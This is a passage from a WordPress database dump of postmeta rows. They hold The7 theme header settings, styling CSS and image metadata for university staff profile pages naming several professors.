(24598,3583,'_dt_fancy_header_padding-top','0px'),
(24599,3583,'_dt_fancy_header_padding-bottom','0px'),
(24600,3583,'_dt_fancy_header_breadcrumbs_heading',''),
(24601,3583,'_dt_fancy_header_breadcrumbs','disabled'),
(24602,3583,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(24603,3583,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(24604,3583,'_dt_fancy_header_title_heading',''),
(24605,3583,'_dt_fancy_header_title_mode','custom'),
(24606,3583,'_dt_fancy_header_title','Prof. Dr. Gomaa Mohamed Dawod'),
(24607,3583,'_dt_fancy_header_title_font_size','30'),
(24608,3583,'_dt_fancy_header_title_line_height','36'),
(24609,3583,'_dt_fancy_header_text_transform','none'),
(24610,3583,'_dt_fancy_header_title_color_mode','color'),
(24611,3583,'_dt_fancy_header_title_color','#ffffff'),
(24612,3583,'_dt_fancy_header_subtitle_heading',''),
(24613,3583,'_dt_fancy_header_subtitle','dawod_gomaa@yahoo.com'),
(24614,3583,'_dt_fancy_header_subtitle_font_size','18'),
(24615,3583,'_dt_fancy_header_subtitle_line_height','26'),
(24616,3583,'_dt_fancy_header_subtitle_text_transform','none'),
(24617,3583,'_dt_fancy_header_subtitle_color_mode','color'),
(24618,3583,'_dt_fancy_header_subtitle_color','#ffffff'),
(24619,3583,'_dt_fancy_header_bg_heading',''),
(24620,3583,'_dt_fancy_header_bg_color','#222222'),
(24621,3583,'_dt_fancy_header_bg_image_origin','custom'),
(24622,3583,'_dt_fancy_header_bg_image','a:0:{}'),
(24623,3583,'_dt_fancy_header_bg_repeat','no-repeat'),
(24624,3583,'_dt_fancy_header_bg_position_x','center'),
(24625,3583,'_dt_fancy_header_bg_position_y','center'),
(24626,3583,'_dt_fancy_header_bg_fullscreen','1'),
(24627,3583,'_dt_fancy_header_bg_overlay','0'),
(24628,3583,'_dt_fancy_header_overlay_color','#000'),
(24629,3583,'_dt_fancy_header_bg_overlay_opacity','50'),
(24630,3583,'_dt_fancy_header_scroll_effect','default'),
(24631,3583,'_dt_fancy_header_bg_parallax','0.5'),
(24632,3583,'_dt_fancy_header_responsiveness_heading',''),
(24633,3583,'_dt_fancy_header_responsiveness','disabled'),
(24634,3583,'_dt_fancy_header_responsiveness_switch','778px'),
(24635,3583,'_dt_fancy_header_responsive_height','70'),
(24636,3583,'_dt_fancy_header_responsive_font_size','30'),
(24637,3583,'_dt_fancy_header_responsive_title_line_height','38'),
(24638,3583,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(24639,3583,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(24640,3583,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(24641,3583,'_dt_teammate_options_go_to_single','1'),
(24642,3583,'_dt_teammate_options_position',''),
(24643,3583,'_dt_teammate_options_website',''),
(24644,3583,'_dt_teammate_options_mail',''),
(24645,3583,'_dt_teammate_options_facebook',''),
(24646,3583,'_dt_teammate_options_twitter',''),
(24647,3583,'_dt_teammate_options_dribbble',''),
(24648,3583,'_dt_teammate_options_you-tube',''),
(24649,3583,'_dt_teammate_options_rss',''),
(24650,3583,'_dt_teammate_options_delicious',''),
(24651,3583,'_dt_teammate_options_flickr',''),
(24652,3583,'_dt_teammate_options_lastfm',''),
(24653,3583,'_dt_teammate_options_linkedin',''),
(24654,3583,'_dt_teammate_options_vimeo',''),
(24655,3583,'_dt_teammate_options_tumbler',''),
(24656,3583,'_dt_teammate_options_pinterest',''),
(24657,3583,'_dt_teammate_options_devian',''),
(24658,3583,'_dt_teammate_options_skype',''),
(24659,3583,'_dt_teammate_options_github',''),
(24660,3583,'_dt_teammate_options_instagram',''),
(24661,3583,'_dt_teammate_options_stumbleupon',''),
(24662,3583,'_dt_teammate_options_behance',''),
(24663,3583,'_dt_teammate_options_px-500',''),
(24664,3583,'_dt_teammate_options_tripedvisor',''),
(24665,3583,'_dt_teammate_options_vk',''),
(24666,3583,'_dt_teammate_options_foursquare',''),
(24667,3583,'_dt_teammate_options_xing',''),
(24668,3583,'_dt_teammate_options_weibo',''),
(24669,3583,'_dt_teammate_options_odnoklassniki',''),
(24670,3583,'_dt_teammate_options_research-gate',''),
(24671,3583,'_dt_teammate_options_yelp',''),
(24672,3583,'_dt_teammate_options_blogger',''),
(24673,3583,'_dt_teammate_options_soundcloud',''),
(24674,3583,'_dt_teammate_options_viber',''),
(24675,3583,'_dt_teammate_options_whatsapp',''),
(24676,3583,'_dt_teammate_options_reddit',''),
(24677,3583,'_dt_teammate_options_snapchat',''),
(24678,3583,'_dt_teammate_options_telegram',''),
(24679,3583,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(24680,3585,'_edit_lock','1673729810:1'),
(24681,3586,'_wp_attached_file','2023/01/loc5.jpg'),
(24682,3586,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:160;s:6:\"height\";i:173;s:4:\"file\";s:16:\"2023/01/loc5.jpg\";s:8:\"filesize\";i:33097;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"loc5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4455;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24683,3585,'_thumbnail_id','3586'),
(24684,3585,'_edit_last','1'),
(24685,3585,'_dt_sidebar_position','disabled'),
(24686,3585,'_dt_sidebar_widgetarea_id','sidebar_1'),
(24687,3585,'_dt_sidebar_hide_on_mobile','0'),
(24688,3585,'_dt_footer_show','1'),
(24689,3585,'_dt_footer_widgetarea_id','sidebar_2'),
(24690,3585,'_dt_footer_hide_on_mobile','0'),
(24691,3585,'_dt_header_title','fancy'),
(24692,3585,'_dt_header_background','normal'),
(24693,3585,'_dt_header_background_below_slideshow','disabled'),
(24694,3585,'_dt_header_transparent_bg_color_scheme','light'),
(24695,3585,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(24696,3585,'_dt_header_transparent_top_bar_bg_opacity','25'),
(24697,3585,'_dt_header_transparent_bg_color','#000000'),
(24698,3585,'_dt_header_transparent_bg_opacity','50'),
(24699,3585,'_dt_header_disabled_background','normal'),
(24700,3585,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(24701,3585,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(24702,3585,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(24703,3585,'_dt_header_disabled_transparent_bg_color','#000000'),
(24704,3585,'_dt_header_disabled_transparent_bg_opacity','50'),
(24705,3585,'_dt_page_overrides_top_margin',''),
(24706,3585,'_dt_page_overrides_right_margin',''),
(24707,3585,'_dt_page_overrides_bottom_margin',''),
(24708,3585,'_dt_page_overrides_left_margin',''),
(24709,3585,'_dt_mobile_page_padding_top',''),
(24710,3585,'_dt_mobile_page_padding_right',''),
(24711,3585,'_dt_mobile_page_padding_bottom',''),
(24712,3585,'_dt_mobile_page_padding_left',''),
(24713,3585,'_dt_fancy_header_layout_heading',''),
(24714,3585,'_dt_fancy_header_title_aligment','center'),
(24715,3585,'_dt_fancy_header_height','300'),
(24716,3585,'_dt_fancy_header_padding-top','0px'),
(24717,3585,'_dt_fancy_header_padding-bottom','0px'),
(24718,3585,'_dt_fancy_header_breadcrumbs_heading',''),
(24719,3585,'_dt_fancy_header_breadcrumbs','disabled'),
(24720,3585,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(24721,3585,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(24722,3585,'_dt_fancy_header_title_heading',''),
(24723,3585,'_dt_fancy_header_title_mode','custom'),
(24724,3585,'_dt_fancy_header_title','Prof. Dr. Ayman Rashad Elshehaby'),
(24725,3585,'_dt_fancy_header_title_font_size','30'),
(24726,3585,'_dt_fancy_header_title_line_height','36'),
(24727,3585,'_dt_fancy_header_text_transform','none'),
(24728,3585,'_dt_fancy_header_title_color_mode','color'),
(24729,3585,'_dt_fancy_header_title_color','#ffffff'),
(24730,3585,'_dt_fancy_header_subtitle_heading',''),
(24731,3585,'_dt_fancy_header_subtitle','Dean, faculty of engineering at Shoubra, Benha university'),
(24732,3585,'_dt_fancy_header_subtitle_font_size','18'),
(24733,3585,'_dt_fancy_header_subtitle_line_height','26'),
(24734,3585,'_dt_fancy_header_subtitle_text_transform','none'),
(24735,3585,'_dt_fancy_header_subtitle_color_mode','color'),
(24736,3585,'_dt_fancy_header_subtitle_color','#ffffff'),
(24737,3585,'_dt_fancy_header_bg_heading',''),
(24738,3585,'_dt_fancy_header_bg_color','#222222'),
(24739,3585,'_dt_fancy_header_bg_image_origin','custom'),
(24740,3585,'_dt_fancy_header_bg_image','a:0:{}'),
(24741,3585,'_dt_fancy_header_bg_repeat','no-repeat'),
(24742,3585,'_dt_fancy_header_bg_position_x','center'),
(24743,3585,'_dt_fancy_header_bg_position_y','center'),
(24744,3585,'_dt_fancy_header_bg_fullscreen','1'),
(24745,3585,'_dt_fancy_header_bg_overlay','0'),
(24746,3585,'_dt_fancy_header_overlay_color','#000'),
(24747,3585,'_dt_fancy_header_bg_overlay_opacity','50'),
(24748,3585,'_dt_fancy_header_scroll_effect','default'),
(24749,3585,'_dt_fancy_header_bg_parallax','0.5'),
(24750,3585,'_dt_fancy_header_responsiveness_heading',''),
(24751,3585,'_dt_fancy_header_responsiveness','disabled'),
(24752,3585,'_dt_fancy_header_responsiveness_switch','778px'),
(24753,3585,'_dt_fancy_header_responsive_height','70'),
(24754,3585,'_dt_fancy_header_responsive_font_size','30'),
(24755,3585,'_dt_fancy_header_responsive_title_line_height','38'),
(24756,3585,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(24757,3585,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(24758,3585,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(24759,3585,'_dt_teammate_options_go_to_single','1'),
(24760,3585,'_dt_teammate_options_position',''),
(24761,3585,'_dt_teammate_options_website',''),
(24762,3585,'_dt_teammate_options_mail',''),
(24763,3585,'_dt_teammate_options_facebook',''),
(24764,3585,'_dt_teammate_options_twitter',''),
(24765,3585,'_dt_teammate_options_dribbble',''),
(24766,3585,'_dt_teammate_options_you-tube',''),
(24767,3585,'_dt_teammate_options_rss',''),
(24768,3585,'_dt_teammate_options_delicious',''),
(24769,3585,'_dt_teammate_options_flickr',''),
(24770,3585,'_dt_teammate_options_lastfm',''),
(24771,3585,'_dt_teammate_options_linkedin',''),
(24772,3585,'_dt_teammate_options_vimeo',''),
(24773,3585,'_dt_teammate_options_tumbler',''),
(24774,3585,'_dt_teammate_options_pinterest',''),
(24775,3585,'_dt_teammate_options_devian',''),
(24776,3585,'_dt_teammate_options_skype',''),
(24777,3585,'_dt_teammate_options_github',''),
(24778,3585,'_dt_teammate_options_instagram',''),
(24779,3585,'_dt_teammate_options_stumbleupon',''),
(24780,3585,'_dt_teammate_options_behance',''),
(24781,3585,'_dt_teammate_options_px-500',''),
(24782,3585,'_dt_teammate_options_tripedvisor',''),
(24783,3585,'_dt_teammate_options_vk',''),
(24784,3585,'_dt_teammate_options_foursquare',''),
(24785,3585,'_dt_teammate_options_xing',''),
(24786,3585,'_dt_teammate_options_weibo',''),
(24787,3585,'_dt_teammate_options_odnoklassniki',''),
(24788,3585,'_dt_teammate_options_research-gate',''),
(24789,3585,'_dt_teammate_options_yelp',''),
(24790,3585,'_dt_teammate_options_blogger',''),
(24791,3585,'_dt_teammate_options_soundcloud',''),
(24792,3585,'_dt_teammate_options_viber',''),
(24793,3585,'_dt_teammate_options_whatsapp',''),
(24794,3585,'_dt_teammate_options_reddit',''),
(24795,3585,'_dt_teammate_options_snapchat',''),
(24796,3585,'_dt_teammate_options_telegram',''),
(24797,3585,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(24798,3587,'_edit_lock','1673729965:1'),
(24799,3588,'_wp_attached_file','2023/01/loc6.jpg'),
(24800,3588,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:133;s:6:\"height\";i:131;s:4:\"file\";s:16:\"2023/01/loc6.jpg\";s:8:\"filesize\";i:23919;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24801,3587,'_thumbnail_id','3588'),
(24802,3587,'_edit_last','1'),
(24803,3587,'_dt_sidebar_position','disabled'),
(24804,3587,'_dt_sidebar_widgetarea_id','sidebar_1'),
(24805,3587,'_dt_sidebar_hide_on_mobile','0'),
(24806,3587,'_dt_footer_show','1'),
(24807,3587,'_dt_footer_widgetarea_id','sidebar_2'),
(24808,3587,'_dt_footer_hide_on_mobile','0'),
(24809,3587,'_dt_header_title','fancy'),
(24810,3587,'_dt_header_background','normal'),
(24811,3587,'_dt_header_background_below_slideshow','disabled'),
(24812,3587,'_dt_header_transparent_bg_color_scheme','light'),
(24813,3587,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(24814,3587,'_dt_header_transparent_top_bar_bg_opacity','25'),
(24815,3587,'_dt_header_transparent_bg_color','#000000'),
(24816,3587,'_dt_header_transparent_bg_opacity','50'),
(24817,3587,'_dt_header_disabled_background','normal'),
(24818,3587,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(24819,3587,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(24820,3587,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(24821,3587,'_dt_header_disabled_transparent_bg_color','#000000'),
(24822,3587,'_dt_header_disabled_transparent_bg_opacity','50'),
(24823,3587,'_dt_page_overrides_top_margin',''),
(24824,3587,'_dt_page_overrides_right_margin',''),
(24825,3587,'_dt_page_overrides_bottom_margin',''),
(24826,3587,'_dt_page_overrides_left_margin',''),
(24827,3587,'_dt_mobile_page_padding_top',''),
(24828,3587,'_dt_mobile_page_padding_right',''),
(24829,3587,'_dt_mobile_page_padding_bottom',''),
(24830,3587,'_dt_mobile_page_padding_left',''),
(24831,3587,'_dt_fancy_header_layout_heading',''),
(24832,3587,'_dt_fancy_header_title_aligment','center'),
(24833,3587,'_dt_fancy_header_height','300'),
(24834,3587,'_dt_fancy_header_padding-top','0px'),
(24835,3587,'_dt_fancy_header_padding-bottom','0px'),
(24836,3587,'_dt_fancy_header_breadcrumbs_heading',''),
(24837,3587,'_dt_fancy_header_breadcrumbs','disabled'),
(24838,3587,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(24839,3587,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(24840,3587,'_dt_fancy_header_title_heading',''),
(24841,3587,'_dt_fancy_header_title_mode','custom'),
(24842,3587,'_dt_fancy_header_title','Prof. Mahmoud Salah'),
(24843,3587,'_dt_fancy_header_title_font_size','30'),
(24844,3587,'_dt_fancy_header_title_line_height','36'),
(24845,3587,'_dt_fancy_header_text_transform','none'),
(24846,3587,'_dt_fancy_header_title_color_mode','color'),
(24847,3587,'_dt_fancy_header_title_color','#ffffff'),
(24848,3587,'_dt_fancy_header_subtitle_heading',''),
(24849,3587,'_dt_fancy_header_subtitle',''),
(24850,3587,'_dt_fancy_header_subtitle_font_size','18'),
(24851,3587,'_dt_fancy_header_subtitle_line_height','26'),
(24852,3587,'_dt_fancy_header_subtitle_text_transform','none'),
(24853,3587,'_dt_fancy_header_subtitle_color_mode','color'),
(24854,3587,'_dt_fancy_header_subtitle_color','#ffffff'),
(24855,3587,'_dt_fancy_header_bg_heading',''),
(24856,3587,'_dt_fancy_header_bg_color','#222222'),
(24857,3587,'_dt_fancy_header_bg_image_origin','custom'),
(24858,3587,'_dt_fancy_header_bg_image','a:0:{}'),
(24859,3587,'_dt_fancy_header_bg_repeat','no-repeat'),
(24860,3587,'_dt_fancy_header_bg_position_x','center'),
(24861,3587,'_dt_fancy_header_bg_position_y','center'),
(24862,3587,'_dt_fancy_header_bg_fullscreen','1'),
(24863,3587,'_dt_fancy_header_bg_overlay','0'),
(24864,3587,'_dt_fancy_header_overlay_color','#000'),
(24865,3587,'_dt_fancy_header_bg_overlay_opacity','50'),
(24866,3587,'_dt_fancy_header_scroll_effect','default'),
(24867,3587,'_dt_fancy_header_bg_parallax','0.5'),
(24868,3587,'_dt_fancy_header_responsiveness_heading',''),
(24869,3587,'_dt_fancy_header_responsiveness','disabled'),
(24870,3587,'_dt_fancy_header_responsiveness_switch','778px'),
(24871,3587,'_dt_fancy_header_responsive_height','70'),
(24872,3587,'_dt_fancy_header_responsive_font_size','30'),
(24873,3587,'_dt_fancy_header_responsive_title_line_height','38'),
(24874,3587,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(24875,3587,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(24876,3587,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(24877,3587,'_dt_teammate_options_go_to_single','1'),
(24878,3587,'_dt_teammate_options_position',''),
(24879,3587,'_dt_teammate_options_website',''),
(24880,3587,'_dt_teammate_options_mail',''),
(24881,3587,'_dt_teammate_options_facebook',''),
(24882,3587,'_dt_teammate_options_twitter',''),
(24883,3587,'_dt_teammate_options_dribbble',''),
(24884,3587,'_dt_teammate_options_you-tube',''),
(24885,3587,'_dt_teammate_options_rss',''),
(24886,3587,'_dt_teammate_options_delicious',''),
(24887,3587,'_dt_teammate_options_flickr',''),
(24888,3587,'_dt_teammate_options_lastfm',''),
(24889,3587,'_dt_teammate_options_linkedin',''),
(24890,3587,'_dt_teammate_options_vimeo',''),
(24891,3587,'_dt_teammate_options_tumbler',''),
(24892,3587,'_dt_teammate_options_pinterest',''),
(24893,3587,'_dt_teammate_options_devian',''),
(24894,3587,'_dt_teammate_options_skype',''),
(24895,3587,'_dt_teammate_options_github',''),
(24896,3587,'_dt_teammate_options_instagram',''),
(24897,3587,'_dt_teammate_options_stumbleupon',''),
(24898,3587,'_dt_teammate_options_behance',''),
(24899,3587,'_dt_teammate_options_px-500',''),
(24900,3587,'_dt_teammate_options_tripedvisor',''),
(24901,3587,'_dt_teammate_options_vk',''),
(24902,3587,'_dt_teammate_options_foursquare',''),
(24903,3587,'_dt_teammate_options_xing',''),
(24904,3587,'_dt_teammate_options_weibo',''),
(24905,3587,'_dt_teammate_options_odnoklassniki',''),
(24906,3587,'_dt_teammate_options_research-gate',''),
(24907,3587,'_dt_teammate_options_yelp',''),
(24908,3587,'_dt_teammate_options_blogger',''),
(24909,3587,'_dt_teammate_options_soundcloud',''),
(24910,3587,'_dt_teammate_options_viber',''),
(24911,3587,'_dt_teammate_options_whatsapp',''),
(24912,3587,'_dt_teammate_options_reddit',''),
(24913,3587,'_dt_teammate_options_snapchat',''),
(24914,3587,'_dt_teammate_options_telegram',''),
(24915,3587,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(24916,3589,'_edit_lock','1680420257:1'),
(24917,3590,'_wp_attached_file','2023/01/loc7.jpg'),
(24918,3590,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:106;s:6:\"height\";i:124;s:4:\"file\";s:16:\"2023/01/loc7.jpg\";s:8:\"filesize\";i:25635;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(24919,3589,'_thumbnail_id','3590'),
(24920,3589,'_edit_last','1'),
(24921,3589,'_dt_sidebar_position','disabled'),
(24922,3589,'_dt_sidebar_widgetarea_id','sidebar_1'),
(24923,3589,'_dt_sidebar_hide_on_mobile','0'),
(24924,3589,'_dt_footer_show','1'),
(24925,3589,'_dt_footer_widgetarea_id','sidebar_2'),
(24926,3589,'_dt_footer_hide_on_mobile','0'),
(24927,3589,'_dt_header_title','fancy'),
(24928,3589,'_dt_header_background','normal'),
(24929,3589,'_dt_header_background_below_slideshow','disabled'),
(24930,3589,'_dt_header_transparent_bg_color_scheme','light'),
(24931,3589,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(24932,3589,'_dt_header_transparent_top_bar_bg_opacity','25'),
(24933,3589,'_dt_header_transparent_bg_color','#000000'),
(24934,3589,'_dt_header_transparent_bg_opacity','50'),
(24935,3589,'_dt_header_disabled_background','normal'),
(24936,3589,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(24937,3589,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(24938,3589,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(24939,3589,'_dt_header_disabled_transparent_bg_color','#000000'),
(24940,3589,'_dt_header_disabled_transparent_bg_opacity','50'),
(24941,3589,'_dt_page_overrides_top_margin',''),
(24942,3589,'_dt_page_overrides_right_margin',''),
(24943,3589,'_dt_page_overrides_bottom_margin',''),
(24944,3589,'_dt_page_overrides_left_margin',''),
(24945,3589,'_dt_mobile_page_padding_top',''),
(24946,3589,'_dt_mobile_page_padding_right',''),
(24947,3589,'_dt_mobile_page_padding_bottom',''),
(24948,3589,'_dt_mobile_page_padding_left',''),
(24949,3589,'_dt_fancy_header_layout_heading',''),
(24950,3589,'_dt_fancy_header_title_aligment','center'),
(24951,3589,'_dt_fancy_header_height','300'),
(24952,3589,'_dt_fancy_header_padding-top','0px'),
(24953,3589,'_dt_fancy_header_padding-bottom','0px'),
(24954,3589,'_dt_fancy_header_breadcrumbs_heading',''),
(24955,3589,'_dt_fancy_header_breadcrumbs','disabled'),
(24956,3589,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(24957,3589,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(24958,3589,'_dt_fancy_header_title_heading',''),
(24959,3589,'_dt_fancy_header_title_mode','custom'),
(24960,3589,'_dt_fancy_header_title','Prof. Amr Ali '),
(24961,3589,'_dt_fancy_header_title_font_size','30'),
(24962,3589,'_dt_fancy_header_title_line_height','36'),
(24963,3589,'_dt_fancy_header_text_transform','none'),
(24964,3589,'_dt_fancy_header_title_color_mode','color'),
(24965,3589,'_dt_fancy_header_title_color','#ffffff'),
(24966,3589,'_dt_fancy_header_subtitle_heading',''),
(24967,3589,'_dt_fancy_header_subtitle',''),
(24968,3589,'_dt_fancy_header_subtitle_font_size','18'),
(24969,3589,'_dt_fancy_header_subtitle_line_height','26'),
(24970,3589,'_dt_fancy_header_subtitle_text_transform','none'),
(24971,3589,'_dt_fancy_header_subtitle_color_mode','color'),
(24972,3589,'_dt_fancy_header_subtitle_color','#ffffff'),
(24973,3589,'_dt_fancy_header_bg_heading',''),
(24974,3589,'_dt_fancy_header_bg_color','#222222'),
(24975,3589,'_dt_fancy_header_bg_image_origin','custom'),
(24976,3589,'_dt_fancy_header_bg_image','a:0:{}'),
(24977,3589,'_dt_fancy_header_bg_repeat','no-repeat'),
(24978,3589,'_dt_fancy_header_bg_position_x','center'),
(24979,3589,'_dt_fancy_header_bg_position_y','center'),
(24980,3589,'_dt_fancy_header_bg_fullscreen','1'),
